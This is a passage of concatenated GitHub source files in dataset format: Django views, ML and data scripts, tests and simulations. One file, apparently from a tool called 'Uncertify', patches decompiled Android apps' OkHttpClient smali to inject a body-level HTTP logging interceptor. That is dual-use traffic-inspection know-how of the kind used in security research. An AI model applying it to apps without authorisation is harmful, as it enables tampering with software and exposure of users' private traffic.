getDistanceCenterLine,getCurLocation,inside_borders,speed,progress,direction_and_waypoint,follow_centerline\n\nclass RaceStep:\n def __init__(self, stepParams, params, stepNum, HISTORY):\n self.HISTORY = HISTORY\n if stepNum == 0:\n self.location = HISTORY.prev_location \n self.closest_waypoints = HISTORY.prev_closest_waypoints if HISTORY.prev_closest_waypoints != None else (0,1)\n print(\"closest_waypoints: \"+str(self.closest_waypoints))\n self.distance_from_center = HISTORY.prev_distance_centerline if HISTORY.prev_distance_centerline != None else 0.00\n print(\"distance_from_center: \"+str(self.distance_from_center))\n self.onTrack = True if (params[\"track_width\"]*.5)>self.distance_from_center else False\n self.stepReward = self.calcStepReward(stepParams, params) if self.onTrack else 0\n self.stepNumber = stepParams[\"stepNumber\"]\n elif stepNum == 1:\n self.location = stepParams[\"location\"]\n self.closest_waypoints = params[\"closest_waypoints\"]\n print(\"closest_waypoints: \"+str(self.closest_waypoints))\n self.distance_from_center = params[\"distance_from_center\"]\n print(\"distance_from_center: \"+str(self.distance_from_center))\n self.onTrack = True if (params[\"track_width\"]*.5)>self.distance_from_center else False \n self.stepReward = self.calcStepReward(stepParams, params) if self.onTrack else 0\n self.stepNumber = stepParams[\"stepNumber\"]\n else:\n self.location = stepParams[\"location\"]\n self.closest_waypoints = getClosestWaypoints(self.location, stepParams, params)\n print(\"closest_waypoints: \"+str(self.closest_waypoints))\n self.distance_from_center = calcDistanceFromCenter(self.closest_waypoints,self.location,stepParams,params)\n print(\"distance_from_center: \"+str(self.distance_from_center))\n self.onTrack = True if (params[\"track_width\"]*.5)>self.distance_from_center else False\n self.stepReward = self.calcStepReward(stepParams, params) if self.onTrack else 0\n self.stepNumber = stepParams[\"stepNumber\"]\n\n def calcStepReward(self, stepParams, params):\n rewardParams = params.copy()\n rewardParams[\"distance_from_center\"] = self.distance_from_center\n rewardParams[\"closest_waypoints\"]= self.closest_waypoints\n centerline_reward = follow_centerline(rewardParams)\n #inside_reward = inside_borders(rewardParams)\n #speed_reward = speed(rewardParams)\n# direction_reward = direction_and_waypoint(rewardParams)\n# curProg = progress(rewardParams)\n #print(\"CenterLine: \"+str(centerline_reward)+\" Direction Reward: \"+str(direction_reward)+\"Progress: \"+str(curProg))\n #print(\"CenterLine: \"+str(centerline_reward)+\" Direction Reward: \"+str(direction_reward)+\" Speed: \"+str(speed_reward))\n #print(\"CenterLine: \"+str(centerline_reward))\n# return float(centerline_reward+direction_reward+curProg)\n return float(centerline_reward)","repo_name":"thh0003/DeepRacer","sub_path":"tboneDeepRacerRaceStep.py","file_name":"tboneDeepRacerRaceStep.py","file_ext":"py","file_size_in_byte":3196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9837066861","text":"import pandas as pd\r\nimport numpy as np\r\nimport re\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nimport difflib\r\nfrom sklearn.metrics.pairwise import cosine_similarity\r\n\r\ndf9 = pd.read_csv('Final.csv')\r\ndef getindex(given_id):\r\n for i in range(len(df9)):\r\n if df9['id'][i] == given_id:\r\n return i\r\n\r\n\r\nmovies_list = df9['title_x'].to_list()\r\nvector = TfidfVectorizer()\r\ncombined_data = df9['genres'] + ' ' + df9['keywords'] + ' ' + df9['tagline'] + ' ' + df9['cast'] + ' ' + df9['directors']\r\nfeatures = vector.fit_transform(combined_data.astype('U'))\r\nsimilarity = cosine_similarity(features)\r\n\r\ndef find_movie(movie_name):\r\n try:\r\n\r\n\r\n movie_name_crrt = difflib.get_close_matches(movie_name,movies_list)[0]\r\n movie_id = df9[df9['title_x'] == movie_name_crrt].values[0][3]\r\n index_of_the_movie = getindex(movie_id)\r\n score_of_similarity = list(enumerate(similarity[index_of_the_movie]))\r\n similar_movies_list = sorted(score_of_similarity,key=lambda x:x[1],reverse=True)[:12]\r\n final_output = []\r\n for i in similar_movies_list:\r\n final_output.append([df9.iloc[i[0]]['title_x'],df9.iloc[i[0]]['directors'],df9.iloc[i[0]]['release_date']])\r\n return final_output\r\n except:\r\n return [['None','None','None']]\r\n\r\nif __name__ == '__main__':\r\n print('Welcome to the Module Page')\r\n\r\n","repo_name":"bhuvan-bhu1/Movie_Recommendation","sub_path":"module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10052067631","text":"import sys\nimport os\nfrom time import sleep\nimport requests\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\n\n# Wait for nodes to be registered\nfrom selenium import webdriver\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\n\nROBOT_BROWSER_TIMEOUT = 30\nTIMEOUT = \"20s\"\nPOLLTIME = \"2s\"\n\ndef check_browser(url):\n elapsed_time = 0\n while elapsed_time != ROBOT_BROWSER_TIMEOUT:\n try:\n driver = webdriver.Remote(\n command_executor=url,\n desired_capabilities=getattr(DesiredCapabilities, 'CHROME')\n )\n driver.quit()\n break\n except:\n sleep(1)\n elapsed_time+=1\n\nTEST_URL = os.getenv('PROJECT_URL')\nBROWSER = os.getenv('BROWSER')\nCOMMAND_EXECUTOR = os.getenv('SELENIUM_HUB')\nDESIRED_CAPABILITIES = {'browserName': BROWSER}\nif not BROWSER:\n BROWSER = 'chrome'\nelif BROWSER == 'ie':\n DESIRED_CAPABILITIES = {'browserName': 'IE', 'browser_version': '11.0', 'os': 'Windows', 'os_version': '8.1', 'resolution': '1024x768', 'browserstack.local': True}\nelif BROWSER == 'safari':\n DESIRED_CAPABILITIES = {'browserName': 'Safari', 'browser_version': '10.1', 'os': 'OS X', 'os_version': 'Sierra', 'resolution': '1024x768', 'browserstack.safari.enablePopups': False, 'browserstack.local': True}\nelif BROWSER == 'iphone':\n DESIRED_CAPABILITIES = {'browserName': 'iPhone', 'platform': 'MAC', 'device': 'iPhone 6S Plus', 'browserstack.safari.enablePopups': False, 'browserstack.local': True}\nelif BROWSER == 'android':\n DESIRED_CAPABILITIES = {'browserName': 'android', 'platform': 'ANDROID', 'device': 'Samsung Galaxy S5', 'browserstack.local': True}\n\n\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\ntest_session = {\n 'role': 'business owner', # Default user is business owner\n 'username': None,\n 'password': None,\n 'login_method': 'PAGE' # Default login is through login page\n}\n","repo_name":"Anu016/POC_automation","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19937812251","text":"# a bar plot with errorbars\nimport numpy as np\nimport matplotlib.pyplot as pl\nimport json\nfrom .db_helper import test_sets\n\nclass BenchmarkRepo:\n @classmethod\n def load(cls, report_path):\n filename = '/'.join(['benchmark', 'results', report_path])\n with open(filename) as f:\n return BenchmarkRepo(json.loads(f.read()))\n\n def __init__(self, raw_benchmark_dict):\n self.raw_benchmark_dict = raw_benchmark_dict\n\n @property\n def means(self):\n return [bm_stats['mean'] * 1000 for bm_stats in self.stats]\n\n @property\n def stddevs(self):\n return [bm_stats['stddev'] * 1000 for bm_stats in self.stats]\n\n @property\n def name(self):\n return self.benchmarks[0]['fullname'].split('::')[0]\n\n def benchmark_names(self, split_by='__'):\n return [bm['name'].split(split_by)[-1] for bm in self.benchmarks]\n\n @property\n def stats(self):\n return [bm['stats'] for bm in self.benchmarks]\n\n @property\n def benchmarks(self):\n return self.raw_benchmark_dict['benchmarks']\n\n\ndef show_plot(report_name):\n new_bm_repo = BenchmarkRepo.load(report_name)\n old_bm_repo = BenchmarkRepo.load(\"current/{}\".format(report_name))\n\n benchmark_json = new_bm_repo.raw_benchmark_dict\n old_benchmark_json = old_bm_repo.raw_benchmark_dict\n\n old_means = old_bm_repo.means\n mean = new_bm_repo.means\n\n name = new_bm_repo.name\n std = new_bm_repo.stddevs\n db_names = new_bm_repo.benchmark_names('_')\n\n users = [test_set.num_of_users for test_set in test_sets]\n handins = [test_set.num_of_handins for test_set in test_sets]\n users_per_handin = [test_set.num_of_users_per_handin for test_set in test_sets]\n\n def build_axis(axis, x_axis, x_label):\n axis.errorbar(x_axis, mean, std)\n axis.errorbar(x_axis, old_means)\n axis.set_ylabel('Time (ms)')\n axis.set_xlabel(x_label)\n axis.set_title(name)\n annotate_db_names(axis, x_axis, mean, db_names)\n\n fig = pl.figure()\n\n a1 = pl.subplot(311)\n build_axis(a1, handins, 'Handins')\n\n a2 = pl.subplot(312)\n build_axis(a2, users, 'Users')\n\n a3 = pl.subplot(313)\n build_axis(a3, users_per_handin, 'Users per Handin')\n\n fig.tight_layout()\n pl.show()\n\n\ndef annotate_db_names(axis, x_axis, y_axis, db_names):\n for index, xy in enumerate(zip(x_axis, y_axis)):\n axis.annotate(db_names[index], xy=xy, textcoords='data')\n","repo_name":"anderslime/smache","sub_path":"benchmark/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":2459,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"9934200073","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.views.generic import ListView, DetailView, DeleteView, UpdateView\nfrom django import forms\nfrom django.urls import reverse_lazy, reverse\nfrom django.views import View\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom pprint import pprint\nfrom django.db.models import Q\nfrom django.http.response import JsonResponse\n\nfrom .forms import AnswerQuestionFormSet, AnswerQuestionForm\nfrom ..models import CustomUserModel, TagModel, PostModel, ESGroupModel, WordCloudModel\nfrom ..esuits_utils.newsapi import newsapi\nfrom ..esuits_utils.wordcloudapi.get_wordcloud import get_wordcloud\n# Create your views here.\n\n\nclass EsEditView(View):\n '''\n ESの質問に回答するページ\n '''\n\n # 過去に投稿したポストのうち関連するものを取得\n def _get_related_posts_list(self, request, es_group_id):\n post_set = PostModel.objects.filter(es_group_id=es_group_id)\n all_posts_by_login_user = PostModel.objects.filter(es_group_id__author=request.user)\n\n related_posts_list = [\n all_posts_by_login_user\n .filter(tags__in=post.tags.all())\n .exclude(pk=post.pk)\n for post in post_set\n ]\n return related_posts_list\n\n # 関連するニュースの取得 (いまはダミー)\n def _get_news_list(self, request, es_group_id):\n news_list = [\n {'title': 'ダミーニュース1', 'url': 'https://news.yahoo.co.jp/pickup/6375312'},\n {'title': 'ダミーニュース2', 'url': 'https://news.yahoo.co.jp/pickup/6375301'},\n ]\n return news_list\n\n # 企業の情報を取得 (今は空)\n def _get_company_info(self, request, es_group_id):\n es_info = ESGroupModel.objects.get(pk=es_group_id)\n company_url = es_info.company_url\n\n wordcloud_path = get_wordcloud(company_url)\n company_info = {\"wordcloud_path\": wordcloud_path[1:]}\n return company_info\n\n def get(self, request, es_group_id):\n template_name = 'esuits/es_edit.html'\n\n if ESGroupModel.objects.filter(pk=es_group_id).exists():\n # ESの存在を確認\n es_info = ESGroupModel.objects.get(pk=es_group_id)\n print('es_info.author.pk: ' + str(es_info.author.pk))\n print('request.user.pk: ' + str(request.user.pk))\n\n if (es_info.author == request.user):\n # 指定されたESが存在し,それが自分のESの場合\n post_set = PostModel.objects.filter(es_group_id=es_group_id)\n formset = AnswerQuestionFormSet(instance=es_info)\n\n # 関連したポスト一覧\n related_posts_list = self._get_related_posts_list(request, es_group_id)\n\n # ニュース関連\n news_list = newsapi.get_news(es_info.company)\n\n # 企業の情報 (ワードクラウドなど)\n # company_info = self._get_company_info(request, es_group_id)\n company_info = None\n\n context = {\n 'message': 'OK',\n 'es_info': es_info,\n 'formset_management_form': formset.management_form,\n 'zipped_posts_info': zip(post_set, formset, related_posts_list),\n 'news_list': news_list,\n 'company_info': company_info,\n 'es_group_id': es_group_id,\n 'num_related_posts': len(related_posts_list)\n }\n return render(request, template_name, context)\n else:\n # 指定されたESが存在するが,それが違う人のESの場合\n context = {\n 'message': '違う人のESなので表示できません',\n 'es_info': {},\n 'zipped_posts_info': (),\n }\n return render(request, template_name, context)\n else:\n # 指定されたESが存在しない場合\n context = {\n 'message': '指定されたESは存在しません',\n 'es_info': {},\n 'zipped_posts_info': (),\n }\n return render(request, template_name, context)\n\n def post(self, request, es_group_id):\n # TODO: 質問に対する答えを更新してDBに格納する処理を書く\n template_name = 'esuits/es_edit.html'\n\n if ESGroupModel.objects.filter(pk=es_group_id).exists():\n # ESの存在を確認\n es_info = ESGroupModel.objects.get(pk=es_group_id)\n print('es_info.author.pk: ' + str(es_info.author.pk))\n print('request.user.pk: ' + str(request.user.pk))\n\n if (es_info.author == request.user):\n # 指定されたESが存在し,それが自分のESの場合\n post_set = PostModel.objects.filter(es_group_id=es_group_id)\n formset = AnswerQuestionFormSet(data=request.POST, instance=es_info)\n\n if formset.is_valid():\n formset.save()\n return redirect('esuits:home')\n\n # 関連したポスト一覧\n related_posts_list = self._get_related_posts_list(request, es_group_id)\n\n # ニュース関連\n news_list = newsapi.get_news(es_info.company)\n\n # 企業の情報 (ワードクラウドなど)\n company_info = self._get_company_info(request, es_group_id)\n\n context = {\n 'message': 'OK',\n 'es_info': es_info,\n 'formset_management_form': formset.management_form,\n 'zipped_posts_info': zip(post_set, formset, related_posts_list),\n 'news_list': news_list,\n 'company_info': company_info,\n }\n return render(request, template_name, context)\n else:\n # 指定されたESが存在するが,それが違う人のESの場合\n context = {\n 'message': '違う人のESなので表示できません',\n 'es_info': {},\n 'zipped_posts_info': (),\n }\n return render(request, template_name, context)\n else:\n # 指定されたESが存在しない場合\n context = {\n 'message': '指定されたESは存在しません',\n 'es_info': {},\n 'zipped_posts_info': (),\n }\n return render(request, template_name, context)\n\n\ndef get_related_post(request):\n pk = int(request.GET.get('pk', ''))\n es = PostModel.objects.get(pk=pk)\n print(es.question, es.answer, sep='¥n')\n return JsonResponse({'question': es.question, 'answer': es.answer})\n\n\ndef get_wordcloud_path(request):\n es_group_id = int(request.GET.get('es_group_id', ''))\n es_group = ESGroupModel.objects.get(pk=es_group_id)\n company_url = es_group.company_url\n\n # WordCloudModelにwordcloud_pathが存在している場合はその画像のパスを取り出す\n try:\n print(company_url + ' already exists')\n wordcloud_path = WordCloudModel.objects.get(company_url=company_url).word_cloud_image_url\n # 存在しない場合は新しくワードクラウドを作成\n except WordCloudModel.DoesNotExist:\n try:\n wordcloud_path = get_wordcloud(company_url)[1:]\n print(wordcloud_path)\n # データベースに保存\n\n new_word_cloud = WordCloudModel(company_url=company_url,\n word_cloud_image_url=wordcloud_path)\n new_word_cloud.save()\n print('created new word cloud')\n except:\n print('error from word_cloud')\n return JsonResponse({'image_path': '/static/esuits/images/wordcloud_failed.png'})\n return JsonResponse({'image_path': wordcloud_path})\n","repo_name":"jphacks/D_2014","sub_path":"esuits/esedit/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8186,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"15614937187","text":"# -*- coding: utf-8 -*-\nfrom django.conf.urls import patterns, url, include\nfrom django.core.urlresolvers import reverse\nfrom django.http import QueryDict\nfrom django.test import TestCase, RequestFactory\nfrom djangular.middleware import DjangularUrlMiddleware\n\nTEST_URLCONF_PATH = 'server.tests.test_urlresolver_view'\n\n\ndef dummy_view(request, *args, **kwargs):\n return {\n 'name': 'DummyView',\n 'request': request,\n 'args': args,\n 'kwargs': kwargs\n }\n\n\ndef dummy_view2(request, *args, **kwargs):\n return {\n 'name': 'DummyView2',\n 'request': request,\n 'args': args,\n 'kwargs': kwargs\n }\n\ninclude1 = patterns('',\n url(r'^home2/$', dummy_view2, name='home2')\n)\n\nurlpatterns = patterns('',\n url(r'^$', dummy_view, name='home'),\n url(r'^(\\d)/(\\d)/(\\d)/$', dummy_view, name='home_args'),\n url(r'^(?P\\d)/(?P\\d)/(?P\\d)$', dummy_view, name='home_kwargs'),\n url(r'^include/', include(include1, namespace='include1'))\n)\n\n\nclass TestUrlResolverView(TestCase):\n pattern_dict = None\n\n def setUp(self):\n self.factory = RequestFactory()\n self.middleware = DjangularUrlMiddleware(urlconf='server.tests.test_urlresolver_view')\n self.url_name_arg = 'djng_url_name'\n self.args_prefix = 'djng_url_args'\n self.kwarg_prefix = 'djng_url_kwarg_'\n super(TestUrlResolverView, self).setUp()\n\n def test_resolver_path_resolution(self):\n url_name = 'home'\n data = {\n self.url_name_arg: url_name\n }\n request = self.factory.get(DjangularUrlMiddleware.ANGULAR_REVERSE, data=data)\n self.middleware.process_request(request)\n self.assertEqual(request.path, reverse('home', urlconf=TEST_URLCONF_PATH))\n\n def test_resolver_path_resolution_include(self):\n url_name = 'include1:home2'\n data = {\n self.url_name_arg: url_name\n }\n request = self.factory.get(DjangularUrlMiddleware.ANGULAR_REVERSE, data=data)\n self.middleware.process_request(request)\n self.assertEqual(request.path, reverse(url_name, urlconf=TEST_URLCONF_PATH))\n\n def test_middleware_request_not_modified(self):\n \"\"\"\n If request.path != request must not be modified\n \"\"\"\n path = '/some/other/url'\n request = self.factory.get(path)\n self.middleware.process_request(request)\n self.assertEqual(request.path, path)\n\n def test_get_args(self):\n \"\"\"\n GET parameters for url resolution should be removed, others kept\n \"\"\"\n args = {'test': '123'}\n data = {\n self.url_name_arg: 'home_args',\n self.args_prefix: [1, 2, 3],\n }\n data.update(args)\n query_dict = QueryDict('', mutable=True)\n query_dict.update(args)\n\n request = self.factory.get(DjangularUrlMiddleware.ANGULAR_REVERSE, data=data)\n self.middleware.process_request(request)\n self.assertEqual(request.GET, query_dict)\n\n def test_kwargs_resolution(self):\n data = {\n self.url_name_arg: 'home_kwargs',\n self.kwarg_prefix + 'id': 1,\n self.kwarg_prefix + 'id2': 2,\n self.kwarg_prefix + 'id3': 3\n }\n request = self.factory.get(DjangularUrlMiddleware.ANGULAR_REVERSE, data=data)\n self.middleware.process_request(request)\n self.assertEqual(request.path, reverse('home_kwargs',\n kwargs={'id': 1, 'id2': 2, 'id3': 3},\n urlconf=TEST_URLCONF_PATH))\n","repo_name":"zdimon/angular","sub_path":"main/static/library/django-angular/examples/server/tests/test_urlresolver_view.py","file_name":"test_urlresolver_view.py","file_ext":"py","file_size_in_byte":3640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22856667356","text":"from datastructuretools.hashmap import *\nfrom systemtools.hayj import *\nfrom twinews.utils import *\n\ndef toCache(cacheFields, *args):\n theJoin = \" \".join(list(cacheFields.keys()))\n for arg in args:\n if not isinstance(arg, list):\n arg = [arg]\n for current in arg:\n if current in theJoin:\n return True\n return False\n\ndef getVector(url, field, cache, newsCollection):\n row = newsCollection.findOne({'url': url}, projection={field: True})\n theHash = objectToHash(row[field])\n return cache[theHash]\n\ndef dictSelect(theDict, keys):\n return dict((k, theDict[k]) for k in keys if k in theDict)\n\ndef getGenericCache(key, readOnly=False, logger=None, verbose=True):\n if readOnly:\n user = 'student'\n else:\n user = 'hayj'\n (user, password, host) = getMongoAuth(user=user)\n if not key.startswith(\"twinews-\"):\n key = \"twinews-\" + key\n return SerializableDict\\\n (\n key,\n user=user, host=host, password=password,\n useMongodb=True, logger=logger, verbose=verbose,\n )\n\ngenericFields = \\\n{\n 'dbert-ft': 'detokText',\n 'dbert-base': 'detokText',\n 'infersent': 'detokSentences',\n 'usent': 'detokText',\n 'sent2vec': 'detokSentences',\n 'doc2vec': 'sentences',\n 'bert': 'detokSentences',\n 'stylo': 'detokText',\n 'nmf': 'sentences',\n 'tfidf': 'sentences',\n 'word2vec': 'sentences',\n 'bow': 'detokSentences',\n}","repo_name":"hayj/Twinews","sub_path":"twinews/models/genericutils.py","file_name":"genericutils.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1928881622","text":"import polars as pl\n\nfrom vi import Agent, Config, Simulation\n\n\nclass MyAgent(Agent):\n def update(self):\n # As accurate proximity calculation is quite performance heavy,\n # we only calculate it once per frame.\n in_radius = self.in_proximity_accuracy().count()\n\n # We want to keep track of how many other agents were in our agent's radius,\n # so we add data to the `in_radius` column of our dataframe!\n self.save_data(\"in_radius\", in_radius)\n\n # If at least one agent is within our agent's radius, then we turn red!\n if in_radius > 0:\n self.change_image(index=1)\n else:\n # Otherwise we turn white.\n self.change_image(index=0)\n\n\nprint(\n # We're using a seed to collect the same data every time.\n Simulation(Config(duration=300, radius=10, seed=1))\n .batch_spawn_agents(\n 1000,\n MyAgent, # 👈 use our own MyAgent class.\n images=[\n \"examples/images/white.png\",\n \"examples/images/red.png\",\n ],\n )\n .run()\n .snapshots.groupby(\"frame\")\n # Count the number of agents (per frame) that see at least one other agent (making them red)\n .agg((pl.col(\"in_radius\") > 0).sum().alias(\"# red agents\"))\n .select(\"# red agents\")\n # Create a statistical summary including the min, mean and max number of red agents.\n .describe()\n)\n","repo_name":"m-rots/violet","sub_path":"examples/data-analysis.py","file_name":"data-analysis.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"24288104968","text":"from collections import deque\nN, K = map(int, input().split())\nqueue = deque([int(i) for i in range(1,N+1)])\n\nwhile len(queue) != 1 :\n for j in range(K-1) :\n queue.append(queue.popleft())\n queue.popleft()\nprint(queue[0])\n\n\n#queue 이용 X\n\"\"\"\nN, K = map(int, input().split())\nprinces = [int(i) for i in range(1,N+1)]\nstart = 0\nwhile len(princes) != 1 :\n index = (start + (K-1))%len(princes)\n del princes[index]\n start = index\n\nprint(princes[0])\n\"\"\"","repo_name":"Yuunhye/Problem_Solving","sub_path":"Study_/공주 구하기.py","file_name":"공주 구하기.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38489551246","text":"import os\nfrom distutils.dir_util import copy_tree\nimport shutil\n\nokhttp_file_name = 'OkHttpClient.smali'\n\n_method_declaration = \".method private static giveMeInterceptors()Ljava/util/List;\\n\"\n_method_end = \".end method\\n\"\n\n_lines = [\"\\t.locals 2\\n\", \"\\tnew-instance v0, Lokhttp3/logging/HttpLoggingInterceptor;\\n\", \"\\tinvoke-direct {v0}, Lokhttp3/logging/HttpLoggingInterceptor;->()V\\n\", \"\\tsget-object v1, Lokhttp3/logging/HttpLoggingInterceptor$Level;->BODY:Lokhttp3/logging/HttpLoggingInterceptor$Level;\\n\", \"\\tinvoke-virtual {v0, v1}, Lokhttp3/logging/HttpLoggingInterceptor;->setLevel(Lokhttp3/logging/HttpLoggingInterceptor$Level;)Lokhttp3/logging/HttpLoggingInterceptor;\\n\", \"\\tnew-instance v1, Ljava/util/ArrayList;\\n\", \"\\tinvoke-direct {v1}, Ljava/util/ArrayList;->()V\\n\", \"\\tinvoke-interface {v1, v0}, Ljava/util/List;->add(Ljava/lang/Object;)Z\\n\", \"\\treturn-object v1\\n\"]\n\n_constructor = \".method public constructor (Lokhttp3/OkHttpClient$Builder;)V\"\n_needle = \"invoke-virtual {p1}, Lokhttp3/OkHttpClient$Builder;->getInterceptors$okhttp()Ljava/util/List;\"\n\n_create_interceptors = \"\\tinvoke-static {}, Lokhttp3/OkHttpClient;->giveMeInterceptors()Ljava/util/List;\\n\"\n\ndef add_http_logging(app_folder):\n okhttp_folders = _get_okhttp_folder(app_folder)\n if len(okhttp_folders) == 0:\n return False\n\n for folder in okhttp_folders:\n _add_logging_folder(folder)\n \n okhttp_files =_get_okhttp_file(app_folder)\n \n for f in okhttp_files:\n _add_logging_method(f)\n _call_logging_method(f)\n return True\n \n\ndef _get_okhttp_folder(app_folder):\n okhttp_folders = []\n for root, dirs, files in os.walk(app_folder):\n if root.endswith(\"okhttp3\"):\n okhttp_folders.append(root)\n return okhttp_folders\n\ndef _add_logging_folder(okhttp_folder):\n shutil.rmtree(okhttp_folder + \"/logging\", ignore_errors=True)\n copy_tree(\"logging\", okhttp_folder + \"/logging\")\n\ndef _get_okhttp_file(app_folder):\n detected_files = []\n for root, dirs, files in os.walk(app_folder):\n if okhttp_file_name in files:\n path = os.path.join(root, okhttp_file_name)\n detected_files.append(path)\n return detected_files\n\n\ndef _add_logging_method(okhttp_file):\n file_lines = open(okhttp_file, 'r').readlines()\n\n file_lines.append(\"\\n\")\n file_lines.append(_method_declaration)\n for item in _lines:\n file_lines.append(item)\n file_lines.append(_method_end)\n file_lines.append(\"\\n\")\n\n with open(okhttp_file, 'w') as okhttp_file:\n for item in file_lines:\n okhttp_file.write(item)\n return True\n\ndef _call_logging_method(okhttp_file):\n file_lines = open(okhttp_file, 'r').readlines()\n # Find the line we need to modify\n needle_index = list(filter(lambda x: _needle in x[1] , zip(range(len(file_lines)), file_lines)))[0][0]\n\n # Check the constructor index\n constructor_index = list(filter(lambda x: _constructor in x[1], zip(range(len(file_lines)), file_lines)))[0][0]\n\n # Check if the call we need to change is used inside the right constructor\n is_good = len(list(filter(lambda x: \".method\" in x[1] and x[0] < needle_index and x[0] > constructor_index, zip(range(len(file_lines)), file_lines)))) == 0\n\n if is_good == False:\n return False\n\n # Change line with our own method that creates interceptors\n file_lines[needle_index] = _create_interceptors\n\n with open(okhttp_file, 'w') as okhttp_file:\n for item in file_lines:\n okhttp_file.write(item)\n return True \n\n","repo_name":"felHR85/Uncertify","sub_path":"logging.py","file_name":"logging.py","file_ext":"py","file_size_in_byte":3565,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"37"} +{"seq_id":"45111720617","text":"import sys\n\nimport pandas as pd\n\n\ndef show_parquet(path: str):\n df = pd.read_parquet(path=path)\n print(df)\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) >= 2:\n show_parquet(sys.argv[1])\n else:\n print(\"missing path\")\n exit(1)\n","repo_name":"HT-Tuan/MLopsVN","sub_path":"utils/show_parquet.py","file_name":"show_parquet.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6866446397","text":"from django.shortcuts import render,redirect\nfrom order.models import Order\nfrom order.forms import OrderForm\nfrom authenticate import Authentication\n# Create your views here.\n@Authentication.valid_user\ndef index(request):\n order=Order.objects.all()\n print(order)\n return render(request,'order/index.html',{'order':order})\n\n@Authentication.valid_user\ndef create(request):\n print(request.POST)\n if request.method==\"POST\":\n form=OrderForm(request.POST)\n form.save()\n request.session.clear()\n return redirect(\"/\")\n","repo_name":"ayush-f/helmet_nepal","sub_path":"order/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22780416620","text":"# A função countdown abaixo tem como objetivo fazer uma contagem regressiva\n# partindo de n até zero.\n\n\ndef countdown(n):\n if n == 0: # caso base\n print(\"FIM!\")\n else:\n print(n)\n countdown(n - 1) # caso recursivo\n\n\ncountdown(5)\n","repo_name":"Marcio-Gabriel-Roque-Mendes/Trybe_exercise","sub_path":"Exercicios/4 - Ciencia da Computacao/bloco-34-algoritmos/dia-2-recursividade-e-estrategias-para-solucao-de-problemas/conteudo-1-leis-de-recursao/contagem_regressiva.py","file_name":"contagem_regressiva.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73066914347","text":"#!/usr/bin/py\nimport os\nimport pandas as pd\nimport numpy as np\nimport pybedtools\nfrom pybedtools import BedTool\n\n\ndf = pd.read_table('/nobackup/shilab/Data/novogene/Counts/R697.counts')\ndf = pd.DataFrame(df)\n\ngtf = BedTool('/nobackup/shilab/Data/novogene/Counts/gencode.v25.annotation.gtf').to_dataframe()\n\ntranscripts = gtf[gtf.feature == 'transcript']\n\nannot = pd.DataFrame()\nannot['gene_id'] = transcripts['attributes'].apply(lambda x: x.split('\"')[1])\nannot['gene_id'] = annot['gene_id'].apply(lambda x: x.split('.')[0])\n\nannot['target_id'] = transcripts['attributes'].apply(lambda x: x.split('\"')[3])\nannot['target_id'] = annot['target_id'].apply(lambda x: x.split('.')[0])\n\nannot = annot.reset_index().drop('index',1)\n\ndf_genes = df.merge(annot, on='target_id').drop('target_id', 1)\n\ndf_genes_group = df_genes.groupby(['gene_id']).sum()\n\ndf_genes_group_round = df_genes_group.apply(lambda x: x.round(0), 0).reset_index()\n\ndf_genes_group.to_csv('/nobackup/shilab/Data/novogene/edgeR_count_matrix.csv', index=True)\ndf_genes_group_round.to_csv('/nobackup/shilab/Data/novogene/edgeR_count_matrix_round.csv', index=False)\n\ndf2 = df.head().apply(lambda x: x.round(0), 0)\n\nresults = pd.read_table('/nobackup/shilab/Data/novogene/Counts/differentially_expressed_genes_edgeR_R697_IGFBP7_silencing_gencodeV24_significant_only_cpm_cut.txt').reset_index()\n\nmart = pd.read_table('/nobackup/shilab/Data/novogene/Counts/gencode.v25.annotation.gtf').rename(columns={'Ensembl Gene ID':'index'})\n\nresults_mart = results.merge(mart, on='index')\n\nresults_mart.to_excel('/nobackup/shilab/Data/novogene/Counts/differentially_expressed_genes_edgeR_R697_IGFBP7_silencing_gencodeV24_significant_only_cpm_cut_named_phenotypes.xlsx', index=False)","repo_name":"cmlnodzak/tools","sub_path":"cell_phenotyper.py","file_name":"cell_phenotyper.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3189488247","text":"import argparse\nimport gi\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk, Gdk, GdkPixbuf, GLib\nimport threading\nimport time\nimport 